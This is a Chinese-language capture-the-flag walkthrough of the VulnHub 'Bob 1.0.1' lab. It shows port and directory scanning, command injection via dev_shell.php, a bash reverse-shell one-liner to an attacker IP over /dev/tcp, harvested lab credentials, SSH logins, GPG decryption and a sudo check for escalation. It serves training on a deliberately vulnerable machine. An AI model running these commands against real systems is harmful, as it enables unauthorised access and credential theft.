Bob_v1.0.1靶机

靶机地址:Bob: 1.0.1 ~ VulnHub

将靶机和攻击机kali同时设为桥接模式,然后查看靶机的MAC地址:

一、信息收集

确定目标主机:

arp-scan -l

查看靶机开放的端口:

nmap -A -sS -sV -v -p- 192.168.7.254

浏览器访问80端口,点击Login功能点,发现外部登录功能已被禁用

使用dirb扫描目录

dirb http://192.168.7.254/

拼接/robots.txt

拼接/login.php

拼接/dev_shell.php

右键检测发现了一个用户名Bob,无其它有用信息

拼接/lat_memo.html,发现了它将Windows服务器移到了Linux服务器上

拼接/passwords.html,发现密码写在笔记中(😁记住这里,下面会用到哦)

在没有其它思路的情况下,能力的点也只有dev_shell.php了,上面知道了网站是在Linux服务器上,那就尝试输入Linux命令——id

二、Getshell

设置监听:

bash -c 'exec bash -i &>/dev/tcp/192.168.7.251/5555 <&1'    #设置反弹shell语句

反弹成功:

查看/etc/passwd文件,发现了六个具有/bin/bash的用户:

在家目录的bob目录中,发现了密码文件.old_passwordfile.html

查看.old_passwordfile.html文件,发现了两组用户名和密码

cat .old_passwordfile.html

jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

使用ssh连接jc用户,连接成功

ssh jc@192.168.7.254 -p25468

在/home/bob/Documents目录下发现了一个login.txt.gpg文件,是个加密文件

在Secret/Keep_Out/Not_Porn/No_Lookie_In_Here目录下发现一个笔记notes.sh文件,此时我们就知道bob用户的密码就在这个文件中

查看notes.sh文件,发现内容是输出一些语句,且每行的首字母都是大写,试着将每一行的大写字母都提取出来 HARPOCRATES或许就是login.txt.gpg加密文件的密码

回到login.txt.gpg文件处对其进行解密,密码为b0bcat_:

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

尝试bob用户ssh连接:

ssh bob@192.168.7.254 -p25468

三、权限提升

sudo -l     #查看可提权的命令

提权成功!

查看flag.txt成功!

  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值